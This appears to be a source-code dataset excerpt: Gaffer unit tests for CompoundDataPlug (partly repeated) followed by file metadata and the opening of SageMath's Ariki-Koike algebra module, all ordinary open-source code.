self.assertEqual( p[0].getName(), "member1" )
self.assertEqual( p[1].getName(), "member2" )
c = IECore.CompoundData()
p.fillCompoundData( c )
self.assertEqual( c, IECore.CompoundData( { "one" : 1, "two" : 2 } ) )
def testAddMembersWithSpecificNames( self ) :
p = Gaffer.CompoundDataPlug()
p.addMembers( IECore.CompoundData( { "one" : 1 } ), useNameAsPlugName=True )
self.assertEqual( len( p ), 1 )
self.assertEqual( p[0].getName(), "one" )
o = IECore.CompoundObject()
p.fillCompoundObject( o )
self.assertEqual( o, IECore.CompoundObject( { "one" : IECore.IntData( 1 ) } ) )
def testAddMembersSerialisation( self ) :
d1 = IECore.CompoundData( { "one" : 1, "two" : 2 } )
s1 = Gaffer.ScriptNode()
s1["n"] = Gaffer.Node()
s1["n"]["user"]["p"] = Gaffer.CompoundDataPlug( flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
s1["n"]["user"]["p"].addMembers( d1 )
s2 = Gaffer.ScriptNode()
s2.execute( s1.serialise() )
d2 = IECore.CompoundData()
s2["n"]["user"]["p"].fillCompoundData( d2 )
self.assertEqual( d1, d2 )
def testBoxTypes( self ) :
p = Gaffer.CompoundDataPlug()
for name, value in [
( "b2f", IECore.Box2fData( imath.Box2f( imath.V2f( 0, 1 ), imath.V2f( 1, 2 ) ) ) ),
( "b2i", IECore.Box2iData( imath.Box2i( imath.V2i( -1, 10 ), imath.V2i( 11, 20 ) ) ) ),
( "b3f", IECore.Box3fData( imath.Box3f( imath.V3f( 0, 1, 2 ), imath.V3f( 3, 4, 5 ) ) ) ),
( "b3i", IECore.Box3iData( imath.Box3i( imath.V3i( 0, 1, 2 ), imath.V3i( 3, 4, 5 ) ) ) ),
] :
p.addChild( Gaffer.NameValuePlug( name, value ) )
self.assertEqual( p.memberDataAndName( p[-1] ), ( value, name ) )
def testBoxPromotion( self ) :
s = Gaffer.ScriptNode()
s["b"] = Gaffer.Box()
s["b"]["n"] = Gaffer.Node()
s["b"]["n"]["p"] = Gaffer.CompoundDataPlug( flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
p = Gaffer.PlugAlgo.promote( s["b"]["n"]["p"] )
p.setName( "p" )
def assertPreconditions( script ) :
self.assertEqual( script["b"]["n"]["p"].keys(), [] )
self.assertEqual( script["b"]["p"].keys(), [] )
self.assertTrue( script["b"]["n"]["p"].getInput().isSame( script["b"]["p"] ) )
def assertPostconditions( script ) :
self.assertEqual( script["b"]["p"].keys(), [ "test" ] )
self.assertEqual( script["b"]["n"]["p"].keys(), [ "test" ] )
self.assertEqual( script["b"]["p"]["test"].keys(), [ "name", "value" ] )
self.assertEqual( script["b"]["n"]["p"]["test"].keys(), [ "name", "value" ] )
self.assertTrue( script["b"]["n"]["p"].getInput().isSame( script["b"]["p"] ) )
self.assertTrue( script["b"]["n"]["p"]["test"].getInput().isSame( script["b"]["p"]["test"] ) )
self.assertTrue( script["b"]["n"]["p"]["test"]["name"].getInput().isSame( script["b"]["p"]["test"]["name"] ) )
self.assertTrue( script["b"]["n"]["p"]["test"]["value"].getInput().isSame( script["b"]["p"]["test"]["value"] ) )
assertPreconditions( s )
with Gaffer.UndoScope( s ) :
p.addChild(
Gaffer.NameValuePlug( "test", 10, "test",
Gaffer.Plug.Direction.In, Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic
)
)
assertPostconditions( s )
s.undo()
assertPreconditions( s )
s.redo()
assertPostconditions( s )
s2 = Gaffer.ScriptNode()
s2.execute( s.serialise() )
assertPostconditions( s2 )
def testHashOmitsDisabledMembers( self ) :
p = Gaffer.CompoundDataPlug()
h1 = p.hash()
m1 = Gaffer.NameValuePlug( "test1", 10, False )
p.addChild( m1 )
m2 = Gaffer.NameValuePlug( "test2", 10, False )
p.addChild( m2 )
# even though we've added members, they're both
# disabled, so as far as the hash is concerned, they're
# not there.
h2 = p.hash()
self.assertEqual( h1, h2 )
# when we enable one, the hash should change.
m1["enabled"].setValue( True )
h3 = p.hash()
self.assertNotEqual( h2, h3 )
# and it should continue to change as we change the
# name and value for the enabled member.
m1["value"].setValue( 20 )
h4 = p.hash()
self.assertNotEqual( h3, h4 )
m1["name"].setValue( "test3" )
h5 = p.hash()
self.assertNotEqual( h4, h5 )
# but changing the name and value for the disabled
# member should have no effect at all.
m2["value"].setValue( 40 )
self.assertEqual( h5, p.hash() )
m2["name"].setValue( "test4" )
self.assertEqual( h5, p.hash() )
def testInternedStringVectorData( self ) :
d = IECore.InternedStringVectorData( [ "a", "b" ] )
p = Gaffer.CompoundDataPlug()
m = Gaffer.NameValuePlug( "test", d )
p.addChild( m )
self.assertTrue( isinstance( m["value"], Gaffer.InternedStringVectorDataPlug ) )
self.assertEqual( m["value"].defaultValue(), d )
self.assertEqual( m["value"].getValue(), d )
v, n = p.memberDataAndName( m )
self.assertEqual( v, d )
self.assertEqual( n, "test" )
def testNonAlphanumericNames( self ) :
p = Gaffer.CompoundDataPlug()
p.addMembers(
IECore.CompoundData( {
"test:A" : 10,
"@j" : 20
} ),
useNameAsPlugName = True,
)
self.assertEqual( set( p.keys() ), { "test_A", "_j" } )
self.assertEqual( p["test_A"]["value"].getValue(), 10 )
self.assertEqual( p["_j"]["value"].getValue(), 20 )
def testNonValuePlugs( self ) :
p = Gaffer.CompoundDataPlug()
p["test"] = Gaffer.NameValuePlug( "name", Gaffer.Plug() )
with self.assertRaisesRegexp( RuntimeError, "Not a ValuePlug" ) :
p.hash()
d = IECore.CompoundData()
with self.assertRaisesRegexp( RuntimeError, "Not a ValuePlug" ) :
p.fillCompoundData( d )
if __name__ == "__main__":
unittest.main()
| 34.432927
| 143
| 0.648309
|
nge(16) ) ) )
self.assertEqual( n, "a" )
def testTransformPlugData( self ) :
p = Gaffer.CompoundDataPlug()
m1 = Gaffer.NameValuePlug( "a", Gaffer.TransformPlug() )
p.addChild( m1 )
m1["value"]["translate"].setValue( imath.V3f( 1,2,3 ) )
self.failUnless( isinstance( m1, Gaffer.ValuePlug ) )
d, n = p.memberDataAndName( m1 )
self.assertEqual( d, IECore.M44fData( imath.M44f(
1, 0, 0, 0,
0, 1, 0, 0,
0, 0, 1, 0,
1, 2, 3, 1,
) ) )
self.assertEqual( n, "a" )
def testPlugFlags( self ) :
p = Gaffer.CompoundDataPlug()
m1 = Gaffer.NameValuePlug( "a", IECore.V3fData( imath.V3f( 1, 2, 3 ) ) )
p.addChild( m1 )
self.assertEqual( m1.getFlags(), Gaffer.Plug.Flags.Default )
self.assertEqual( m1["name"].getFlags(), Gaffer.Plug.Flags.Default)
self.assertEqual( m1["value"].getFlags(), Gaffer.Plug.Flags.Default )
m2 = Gaffer.NameValuePlug( "a", IECore.V3fData( imath.V3f( 1, 2, 3 ) ), True )
p.addChild( m2 )
self.assertEqual( m2.getFlags(), Gaffer.Plug.Flags.Default )
self.assertEqual( m2["name"].getFlags(), Gaffer.Plug.Flags.Default )
self.assertEqual( m2["value"].getFlags(), Gaffer.Plug.Flags.Default )
self.assertEqual( m2["enabled"].getFlags(), Gaffer.Plug.Flags.Default )
def testCreateCounterpart( self ) :
p1 = Gaffer.CompoundDataPlug()
m1 = Gaffer.NameValuePlug( "a", IECore.V3fData( imath.V3f( 1, 2, 3 ) ), "member1" )
p1.addChild( m1 )
p2 = p1.createCounterpart( "c", Gaffer.Plug.Direction.Out )
self.assertEqual( p2.typeName(), p1.typeName() )
self.assertEqual( p2.getName(), "c" )
self.assertEqual( p2.direction(), Gaffer.Plug.Direction.Out )
self.assertEqual( len( p2 ), len( p1 ) )
self.assertEqual( p2.getFlags(), p1.getFlags() )
m2 = p2["member1"]
self.assertEqual( m2.typeName(), m1.typeName() )
self.assertEqual( m2.getFlags(), m1.getFlags() )
self.assertEqual( m2.direction(), Gaffer.Plug.Direction.Out )
self.assertEqual( m2.keys(), m1.keys() )
def testCreateWithValuePlug( self ) :
p = Gaffer.CompoundDataPlug()
v = Gaffer.IntPlug( minValue = -10, maxValue = 10, flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
m1 = Gaffer.NameValuePlug( "a", v )
p.addChild( m1 )
self.assertTrue( v.parent().isSame( m1 ) )
self.assertEqual( m1["value"].getName(), "value" )
self.assertEqual( m1.getFlags(), Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
self.assertEqual( p.memberDataAndName( m1 ), ( IECore.IntData( 0 ), "a" ) )
v2 = Gaffer.IntPlug( defaultValue = 5, minValue = -10, maxValue = 10 )
m2 = Gaffer.NameValuePlug( "b", v2, True, name = "blah" )
p.addChild( m2 )
self.assertTrue( v2.parent().isSame( m2 ) )
self.assertEqual( m2["value"].getName(), "value" )
self.assertEqual( m2.getFlags(), Gaffer.Plug.Flags.Default )
self.assertEqual( p.memberDataAndName( m2 ), ( IECore.IntData( 5 ), "b" ) )
def testAdditionalChildrenRejected( self ) :
p = Gaffer.CompoundDataPlug()
self.assertRaises( RuntimeError, p.addChild, Gaffer.IntPlug() )
self.assertRaises( RuntimeError, p.addChild, Gaffer.Plug() )
m = Gaffer.NameValuePlug( "a", IECore.IntData( 10 ) )
self.assertRaises( RuntimeError, m.addChild, Gaffer.IntPlug() )
self.assertRaises( RuntimeError, m.addChild, Gaffer.StringPlug( "name" ) )
self.assertRaises( RuntimeError, m.addChild, Gaffer.IntPlug( "name" ) )
self.assertRaises( RuntimeError, m.addChild, Gaffer.IntPlug( "value" ) )
def testSerialisation( self ) :
s = Gaffer.ScriptNode()
s["n"] = Gaffer.Node()
s["n"]["p"] = Gaffer.CompoundDataPlug( flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
s["n"]["p"].addChild( Gaffer.NameValuePlug( "a", IECore.IntData( 10 ), "a", flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic ) )
s2 = Gaffer.ScriptNode()
s2.execute( s.serialise() )
self.assertEqual(
s["n"]["p"].memberDataAndName( s["n"]["p"]["a"] ),
s2["n"]["p"].memberDataAndName( s2["n"]["p"]["a"] ),
)
def testAddMembers( self ) :
p = Gaffer.CompoundDataPlug()
p.addMembers( IECore.CompoundData( { "one" : 1, "two" : 2 } ) )
self.assertEqual( len( p ), 2 )
self.assertEqual( p[0].getName(), "member1" )
self.assertEqual( p[1].getName(), "member2" )
c = IECore.CompoundData()
p.fillCompoundData( c )
self.assertEqual( c, IECore.CompoundData( { "one" : 1, "two" : 2 } ) )
def testAddMembersWithSpecificNames( self ) :
p = Gaffer.CompoundDataPlug()
p.addMembers( IECore.CompoundData( { "one" : 1 } ), useNameAsPlugName=True )
self.assertEqual( len( p ), 1 )
self.assertEqual( p[0].getName(), "one" )
o = IECore.CompoundObject()
p.fillCompoundObject( o )
self.assertEqual( o, IECore.CompoundObject( { "one" : IECore.IntData( 1 ) } ) )
def testAddMembersSerialisation( self ) :
d1 = IECore.CompoundData( { "one" : 1, "two" : 2 } )
s1 = Gaffer.ScriptNode()
s1["n"] = Gaffer.Node()
s1["n"]["user"]["p"] = Gaffer.CompoundDataPlug( flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
s1["n"]["user"]["p"].addMembers( d1 )
s2 = Gaffer.ScriptNode()
s2.execute( s1.serialise() )
d2 = IECore.CompoundData()
s2["n"]["user"]["p"].fillCompoundData( d2 )
self.assertEqual( d1, d2 )
def testBoxTypes( self ) :
p = Gaffer.CompoundDataPlug()
for name, value in [
( "b2f", IECore.Box2fData( imath.Box2f( imath.V2f( 0, 1 ), imath.V2f( 1, 2 ) ) ) ),
( "b2i", IECore.Box2iData( imath.Box2i( imath.V2i( -1, 10 ), imath.V2i( 11, 20 ) ) ) ),
( "b3f", IECore.Box3fData( imath.Box3f( imath.V3f( 0, 1, 2 ), imath.V3f( 3, 4, 5 ) ) ) ),
( "b3i", IECore.Box3iData( imath.Box3i( imath.V3i( 0, 1, 2 ), imath.V3i( 3, 4, 5 ) ) ) ),
] :
p.addChild( Gaffer.NameValuePlug( name, value ) )
self.assertEqual( p.memberDataAndName( p[-1] ), ( value, name ) )
def testBoxPromotion( self ) :
s = Gaffer.ScriptNode()
s["b"] = Gaffer.Box()
s["b"]["n"] = Gaffer.Node()
s["b"]["n"]["p"] = Gaffer.CompoundDataPlug( flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
p = Gaffer.PlugAlgo.promote( s["b"]["n"]["p"] )
p.setName( "p" )
def assertPreconditions( script ) :
self.assertEqual( script["b"]["n"]["p"].keys(), [] )
self.assertEqual( script["b"]["p"].keys(), [] )
self.assertTrue( script["b"]["n"]["p"].getInput().isSame( script["b"]["p"] ) )
def assertPostconditions( script ) :
self.assertEqual( script["b"]["p"].keys(), [ "test" ] )
self.assertEqual( script["b"]["n"]["p"].keys(), [ "test" ] )
self.assertEqual( script["b"]["p"]["test"].keys(), [ "name", "value" ] )
self.assertEqual( script["b"]["n"]["p"]["test"].keys(), [ "name", "value" ] )
self.assertTrue( script["b"]["n"]["p"].getInput().isSame( script["b"]["p"] ) )
self.assertTrue( script["b"]["n"]["p"]["test"].getInput().isSame( script["b"]["p"]["test"] ) )
self.assertTrue( script["b"]["n"]["p"]["test"]["name"].getInput().isSame( script["b"]["p"]["test"]["name"] ) )
self.assertTrue( script["b"]["n"]["p"]["test"]["value"].getInput().isSame( script["b"]["p"]["test"]["value"] ) )
assertPreconditions( s )
with Gaffer.UndoScope( s ) :
p.addChild(
Gaffer.NameValuePlug( "test", 10, "test",
Gaffer.Plug.Direction.In, Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic
)
)
assertPostconditions( s )
s.undo()
assertPreconditions( s )
s.redo()
assertPostconditions( s )
s2 = Gaffer.ScriptNode()
s2.execute( s.serialise() )
assertPostconditions( s2 )
def testHashOmitsDisabledMembers( self ) :
p = Gaffer.CompoundDataPlug()
h1 = p.hash()
m1 = Gaffer.NameValuePlug( "test1", 10, False )
p.addChild( m1 )
m2 = Gaffer.NameValuePlug( "test2", 10, False )
p.addChild( m2 )
# not there.
h2 = p.hash()
self.assertEqual( h1, h2 )
# when we enable one, the hash should change.
m1["enabled"].setValue( True )
h3 = p.hash()
self.assertNotEqual( h2, h3 )
# and it should continue to change as we change the
# name and value for the enabled member.
m1["value"].setValue( 20 )
h4 = p.hash()
self.assertNotEqual( h3, h4 )
m1["name"].setValue( "test3" )
h5 = p.hash()
self.assertNotEqual( h4, h5 )
# but changing the name and value for the disabled
# member should have no effect at all.
m2["value"].setValue( 40 )
self.assertEqual( h5, p.hash() )
m2["name"].setValue( "test4" )
self.assertEqual( h5, p.hash() )
def testInternedStringVectorData( self ) :
d = IECore.InternedStringVectorData( [ "a", "b" ] )
p = Gaffer.CompoundDataPlug()
m = Gaffer.NameValuePlug( "test", d )
p.addChild( m )
self.assertTrue( isinstance( m["value"], Gaffer.InternedStringVectorDataPlug ) )
self.assertEqual( m["value"].defaultValue(), d )
self.assertEqual( m["value"].getValue(), d )
v, n = p.memberDataAndName( m )
self.assertEqual( v, d )
self.assertEqual( n, "test" )
def testNonAlphanumericNames( self ) :
p = Gaffer.CompoundDataPlug()
p.addMembers(
IECore.CompoundData( {
"test:A" : 10,
"@j" : 20
} ),
useNameAsPlugName = True,
)
self.assertEqual( set( p.keys() ), { "test_A", "_j" } )
self.assertEqual( p["test_A"]["value"].getValue(), 10 )
self.assertEqual( p["_j"]["value"].getValue(), 20 )
def testNonValuePlugs( self ) :
p = Gaffer.CompoundDataPlug()
p["test"] = Gaffer.NameValuePlug( "name", Gaffer.Plug() )
with self.assertRaisesRegexp( RuntimeError, "Not a ValuePlug" ) :
p.hash()
d = IECore.CompoundData()
with self.assertRaisesRegexp( RuntimeError, "Not a ValuePlug" ) :
p.fillCompoundData( d )
if __name__ == "__main__":
unittest.main()
| true
| true
|
1c4487923cc10926d95b12ba8c29699382d7d631
| 68,540
|
py
|
Python
|
src/sage/algebras/hecke_algebras/ariki_koike_algebra.py
|
dcoudert/sage
|
c349c87d0dea805c92d589a259c4ed1a20407ca5
|
[
"BSL-1.0"
] | null | null | null |
src/sage/algebras/hecke_algebras/ariki_koike_algebra.py
|
dcoudert/sage
|
c349c87d0dea805c92d589a259c4ed1a20407ca5
|
[
"BSL-1.0"
] | null | null | null |
src/sage/algebras/hecke_algebras/ariki_koike_algebra.py
|
dcoudert/sage
|
c349c87d0dea805c92d589a259c4ed1a20407ca5
|
[
"BSL-1.0"
] | null | null | null |
# -*- coding: utf-8 -*-
r"""
Ariki-Koike Algebras
The *Ariki-Koike algebras* were introduced by Ariki and Koike [AK1994]_ as
a natural generalization of the Iwahori-Hecke algebras of types `A` and `B`
(see :class:`~sage.algebras.iwahori_hecke_algebra.IwahoriHeckeAlgebra`).
Soon afterwards, Broué and Malle defined analogues of the Hecke
algebras for all complex reflection groups
Fix non-negative integers `r` an `n`. The Ariki-Koike algebras are
deformations of the group algebra of the complex reflection group
`G(r, 1, n) = \ZZ / r\ZZ \wr \mathfrak{S}_n`. If `R` is a ring containing a
*Hecke parameter* `q` and *cyclotomic parameters* `u_0, \ldots, u_{r-1}` then
the Ariki-Koike algebra `H_n(q, u_1, \ldots, u_r)` is the unital associative
`r`-algebra with generators `T_0, T_1, \ldots, T_{n-1}` an relations:
.. MATH::
\begin{aligned}
\prod_{i=0}^{r-1} (T_0 - u_i) & = 0, \\
T_i^2 & = (q - 1) T_i + q && \text{for } 1 \leq i < n, \\
T_0 T_1 T_0 T_1 & = T_1 T_0 T_1 T_0, \\
T_i T_j & = T_j T_i && \text{if } |i - j| \geq 2, \\
T_i T_{i+1} T_i & = T_{i+1} T_i T_{i+1} && \text{for } 1 \leq i < n.
\end{aligned}
AUTHORS:
- Travis Scrimshaw (2016-04): initial version
- Andrew Mathas (2016-07): improved multiplication code
REFERENCES:
- [AK1994]_
- [BM1993]_
- [MM1998]_
"""
#*****************************************************************************
# Copyright (C) 2016-2018 Travis Scrimshaw <tcscrims at gmail.com>
# 2016-2018 Andrew Mathas <andrew.mathas at sydney.edu.au>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
# http://www.gnu.org/licenses/
#*****************************************************************************
from sage.misc.cachefunc import cached_method
from sage.misc.lazy_attribute import lazy_attribute
from sage.misc.misc_c import prod
from sage.misc.bindable_class import BindableClass
from sage.structure.parent import Parent
from sage.structure.unique_representation import UniqueRepresentation
from sage.categories.algebras import Algebras
from sage.categories.rings import Rings
from sage.categories.realizations import Realizations, Category_realization_of_parent
from sage.categories.cartesian_product import cartesian_product
from sage.rings.polynomial.polynomial_ring_constructor import PolynomialRing
from sage.rings.polynomial.laurent_polynomial_ring import LaurentPolynomialRing
from sage.rings.integer_ring import ZZ
from sage.combinat.free_module import CombinatorialFreeModule
from sage.combinat.permutation import Permutations
from sage.sets.family import Family
from sage.data_structures.blas_dict import iaxpy
# ABC for basis classes
class _Basis(CombinatorialFreeModule, BindableClass):
r"""
Abstract base class for bases of the Ariki-Koike algebra.
"""
def __init__(self, algebra, prefix='AK'):
r"""
Initialize ``self``.
EXAMPLES::
sage: LT = algebras.ArikiKoike(2, 3).LT()
sage: TestSuite(LT).run()
"""
self._r = algebra._r
self._n = algebra._n
self._q = algebra._q
self._u = algebra._u
# It seems more efficient to copy this as we need it a lot
self._zero_tuple = tuple([0] * self._n)
self._Pn = Permutations(self._n)
self._one_perm = self._Pn.one()
C = cartesian_product([range(self._r)] * self._n)
indices = cartesian_product([C, self._Pn])
CombinatorialFreeModule.__init__(self, algebra.base_ring(), indices,
prefix=prefix,
category=algebra._BasesCategory())
@cached_method
def one_basis(self):
r"""
Return the index of the basis element of `1`.
EXAMPLES::
sage: LT = algebras.ArikiKoike(5, 3).LT()
sage: LT.one_basis()
((0, 0, 0), [1, 2, 3])
sage: T = algebras.ArikiKoike(5, 3).T()
sage: T.one_basis()
((0, 0, 0), [1, 2, 3])
"""
return (self._zero_tuple, self._one_perm)
class ArikiKoikeAlgebra(Parent, UniqueRepresentation):
r"""
The Ariki-Koike algebra `H_{r,n}(q, u)`.
Let `R` be an unital integral domain.
Let `q, u_0, \ldots, u_{r-1} \in R` such that `q^{-1} \in R`.
The *Ariki-Koike algebra* is the unital associative algebra
`H_{r,n}(q, u)` generated by `T_0, \ldots, T_{n-1}` that satisfies
the following relations:
.. MATH::
\begin{aligned}
\prod_{i=0}^{r-1} (T_0 - u_i) & = 0, \\
T_i^2 & = (q - 1) T_i + q && \text{for } 1 \leq i < n, \\
T_0 T_1 T_0 T_1 & = T_1 T_0 T_1 T_0, \\
T_i T_j & = T_j T_i && \text{if } |i - j| \geq 2, \\
T_i T_{i+1} T_i & = T_{i+1} T_i T_{i+1} && \text{for } 1 \leq i < n.
\end{aligned}
The parameter `q` is called the *Hecke parameter* and the parameters
`u_0, \ldots, u_{r-1}` are called the *cyclotomic parameters*.
Thus, the Ariki-Koike algebra is a deformation of the group algebra of the
complex reflection group `G(r, 1, n) = \ZZ / r\ZZ \wr \mathfrak{S}_n`.
Next, we define *Jucys-Murphy elements*
.. MATH::
L_i = q^{-i+1} T_{i-1} \cdots T_1 T_0 T_1 \cdots T_{i-1}
for `1 \leq i \leq n`.
.. NOTE::
These element differ by a power of `q` from the corresponding
elements in [AK1994]_. However, these elements are more commonly
used because they lead to nicer representation theoretic formulas.
Ariki and Koike [AK1994]_ showed that `H_{r,n}(q, u)` is a free
`R`-module with a basis given by
.. MATH::
\{ L_1^{c_i} \cdots L_n^{c_n} T_w \mid w \in S_n, 0 \leq c_i < r \}.
In particular, we have `\dim H_{r,n}(q,u) = r^n n! = |G(r, 1, n)|`.
Moreover, we have `L_i L_j = L_i L_j` for all `1 \leq i, j \leq n`.
The Ariki-Koike algebra `H_{r,n}(q, u)` can be considered as a quotient
of the group algebra of the braid group for `G(r, 1, n)` by the ideal
generated by `\prod_{i=0}^{r-1} (T_0 - u_i)` and `(T_i - q)(T_i + 1)`.
Furthermore, `H_{r,n}(q, u)` can be constructed as a quotient of the
extended affine Hecke algebra of type `A_{n-1}^{(1)}` by
`\prod_{i=0}^{r-1} (X_1 - u_i)`.
Since the Ariki-Koike algebra is a quotient of the group
algebra of the braid group of `G(r, 1, n)`, we can recover
the group algebra of `G(r, 1, n)` as follows. Consider
`u = (1, \zeta_r, \ldots, \zeta_r^{r-1})`, where `\zeta_r`
is a primitive `r`-th root of unity, then we have
.. MATH::
R G(r, 1, n) = H_{r,n}(1, u).
INPUT:
- ``r`` -- the maximum power of `L_i`
- ``n`` -- the rank `S_n`
- ``q`` -- (optional) an invertible element in a commutative ring;
the default is `q \in R[q,q^{-1}]`, where `R` is the ring containing
the variables ``u``
- ``u`` -- (optional) the variables `u_1, \ldots, u_r`; the
default is the generators of `\ZZ[u_1, \ldots, u_r]`
- ``R`` -- (optional) a commutative ring containing ``q`` and ``u``;
the default is the parent of `q` and `u_1, \ldots, u_r`
EXAMPLES:
We start by constructing an Ariki-Koike algebra where the
values `q, u` are generic and do some computations::
sage: H = algebras.ArikiKoike(3, 4)
Next, we do some computations using the `LT` basis::
sage: LT = H.LT()
sage: LT.inject_variables()
Defining L1, L2, L3, L4, T1, T2, T3
sage: T1 * T2 * T1 * T2
q*T[2,1] - (1-q)*T[2,1,2]
sage: T1 * L1 * T2 * L3 * T1 * T2
-(q-q^2)*L2*L3*T[2] + q*L1*L2*T[2,1] - (1-q)*L1*L2*T[2,1,2]
sage: L1^3
u0*u1*u2 + ((-u0*u1-u0*u2-u1*u2))*L1 + ((u0+u1+u2))*L1^2
sage: L3 * L2 * L1
L1*L2*L3
sage: u = LT.u()
sage: q = LT.q()
sage: (q + 2*u[0]) * (T1 * T2) * L3
(-2*u0+(2*u0-1)*q+q^2)*L3*T[1] + (-2*u0+(2*u0-1)*q+q^2)*L2*T[2]
+ (2*u0+q)*L1*T[1,2]
We check the defining relations::
sage: prod(L1 - val for val in u) == H.zero()
True
sage: L1 * T1 * L1 * T1 == T1 * L1 * T1 * L1
True
sage: T1 * T2 * T1 == T2 * T1 * T2
True
sage: T2 * T3 * T2 == T3 * T2 * T3
True
sage: L2 == q^-1 * T1 * L1 * T1
True
sage: L3 == q^-2 * T2 * T1 * L1 * T1 * T2
True
We construct an Ariki-Koike algebra with `u = (1, \zeta_3, \zeta_3^2)`,
where `\zeta_3` is a primitive third root of unity::
sage: F = CyclotomicField(3)
sage: zeta3 = F.gen()
sage: R.<q> = LaurentPolynomialRing(F)
sage: H = algebras.ArikiKoike(3, 4, q=q, u=[1, zeta3, zeta3^2], R=R)
sage: H.LT().inject_variables()
Defining L1, L2, L3, L4, T1, T2, T3
sage: L1^3
1
sage: L2^3
1 - (q^-1-1)*T[1] - (q^-1-1)*L1*L2^2*T[1] - (q^-1-1)*L1^2*L2*T[1]
Next, we additionally take `q = 1` to obtain the group algebra
of `G(r, 1, n)`::
sage: F = CyclotomicField(3)
sage: zeta3 = F.gen()
sage: H = algebras.ArikiKoike(3, 4, q=1, u=[1, zeta3, zeta3^2], R=F)
sage: LT = H.LT()
sage: LT.inject_variables()
Defining L1, L2, L3, L4, T1, T2, T3
sage: A = ColoredPermutations(3, 4).algebra(F)
sage: s1, s2, s3, s0 = list(A.algebra_generators())
sage: all(L^3 == LT.one() for L in LT.L())
True
sage: J = [s0, s3*s0*s3, s2*s3*s0*s3*s2, s1*s2*s3*s0*s3*s2*s1]
sage: all(Ji^3 == A.one() for Ji in J)
True
"""
@staticmethod
def __classcall_private__(cls, r, n, q=None, u=None, R=None):
r"""
Standardize input to ensure a unique representation.
TESTS::
sage: H1 = algebras.ArikiKoike(4, 3)
sage: S = PolynomialRing(ZZ, 'u', 4)
sage: R.<q> = LaurentPolynomialRing(S)
sage: H2 = algebras.ArikiKoike(4, 3, q=q)
sage: H3 = algebras.ArikiKoike(4, 3, q, S.gens(), R)
sage: H1 is H2
True
sage: H2 is H3
True
"""
if u is None:
if q is not None:
R = q.parent()
if R is None:
R = PolynomialRing(ZZ, 'u', r)
u = R.gens()
if q is None:
R = LaurentPolynomialRing(R, 'q')
q = R.gen()
else:
u = PolynomialRing(ZZ, 'u', r).gens()
if q is None:
q = 'q'
else:
if not isinstance(u, (list,tuple)):
u = [u]*r
if R is None:
from sage.structure.element import get_coercion_model
cm = get_coercion_model()
if q is None:
R = cm.common_parent(*[val.parent() for val in u])
R = LaurentPolynomialRing(R, 'q')
q = R.gen()
else:
R = cm.common_parent(q.parent(), *[val.parent() for val in u])
elif q is None:
q = 'q'
u = [R(val) for val in u]
if R not in Rings().Commutative():
raise TypeError("base ring must be a commutative ring")
q = R(q)
u = tuple(u)
return super(ArikiKoikeAlgebra, cls).__classcall__(cls, r, n, q, u, R)
def __init__(self, r, n, q, u, R):
r"""
Initialize ``self``.
EXAMPLES::
sage: H = algebras.ArikiKoike(5, 3)
sage: TestSuite(H).run()
sage: H = algebras.ArikiKoike(1, 4)
sage: TestSuite(H).run()
sage: H = algebras.ArikiKoike(2, 3)
sage: TestSuite(H).run()
sage: H = algebras.ArikiKoike(3, 4)
sage: TestSuite(H).run() # long time
"""
self._r = r
self._n = n
self._q = q
self._u = u
self._category = Algebras(R).FiniteDimensional().WithBasis()
Parent.__init__(self, base=R, category=self._category.WithRealizations())
T = self.T()
LT = self.LT()
T.module_morphism(LT._from_T_basis, codomain=LT).register_as_coercion()
LT.module_morphism(T._from_LT_basis, codomain=T).register_as_coercion()
def _repr_(self):
r"""
Return a string representation of ``self``.
EXAMPLES::
sage: algebras.ArikiKoike(5, 2)
Ariki-Koike algebra of rank 5 and order 2
with q=q and u=(u0, u1, u2, u3, u4)
over Univariate Laurent Polynomial Ring in q
over Multivariate Polynomial Ring in u0, u1, u2, u3, u4
over Integer Ring
"""
return "Ariki-Koike algebra of rank {} and order {} with q={} and u={} over {}".format(
self._r, self._n, self._q, self._u, self.base_ring())
def _latex_(self):
r"""
Return a latex representation of ``self``.
EXAMPLES::
sage: H = algebras.ArikiKoike(5, 2)
sage: latex(H)
\mathcal{H}_{5,2}(q)
"""
return "\\mathcal{H}_{%s,%s}(%s)"%(self._r, self._n, self._q)
def hecke_parameter(self):
r"""
Return the Hecke parameter `q` of ``self``.
EXAMPLES::
sage: H = algebras.ArikiKoike(5, 3)
sage: H.hecke_parameter()
q
"""
return self._q
q = hecke_parameter
def cyclotomic_parameters(self):
r"""
Return the cyclotomic parameters `u` of ``self``.
EXAMPLES::
sage: H = algebras.ArikiKoike(5, 3)
sage: H.cyclotomic_parameters()
(u0, u1, u2, u3, u4)
"""
return self._u
u = cyclotomic_parameters
def a_realization(self):
r"""
Return a realization of ``self``.
EXAMPLES::
sage: H = algebras.ArikiKoike(5, 2)
sage: H.a_realization()
Ariki-Koike algebra of rank 5 and order 2
with q=q and u=(u0, u1, u2, u3, u4) ... in the LT-basis
"""
return self.LT()
class _BasesCategory(Category_realization_of_parent):
r"""
The category of bases of a Ariki-Koike algebra.
"""
def __init__(self, base):
r"""
Initialize ``self``.
INPUT:
- ``base`` -- a Ariki-Koike algebra
TESTS::
sage: H = algebras.ArikiKoike(5, 2)
sage: bases = H._BasesCategory()
sage: H.T() in bases
True
"""
Category_realization_of_parent.__init__(self, base)
def super_categories(self):
r"""
The super categories of ``self``.
EXAMPLES::
sage: H = algebras.ArikiKoike(5, 2)
sage: bases = H._BasesCategory()
sage: bases.super_categories()
[Category of realizations of Ariki-Koike algebra of rank 5 and order 2
with q=q and u=(u0, u1, u2, u3, u4) over ...,
Category of finite dimensional algebras with basis over ...]
"""
return [Realizations(self.base()), self.base()._category]
def _repr_(self):
r"""
Return the representation of ``self``.
EXAMPLES::
sage: H = algebras.ArikiKoike(5, 2)
sage: H._BasesCategory()
